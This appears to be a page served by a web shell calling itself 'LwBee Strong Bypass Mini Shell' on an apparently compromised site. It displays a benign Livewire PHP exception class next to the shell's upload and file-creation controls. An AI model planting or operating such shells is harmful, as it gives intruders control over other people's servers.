/home/aloic1/public_html/core/vendor/livewire/livewire/src/Exceptions/MissingRulesException.php
<?php

namespace Livewire\Exceptions;

class MissingRulesException extends \Exception
{
    use BypassViewHandler;

    public function __construct($component)
    {
        parent::__construct(
            "Missing [\$rules/rules()] property/method on Livewire component: [{$component}]."
        );
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File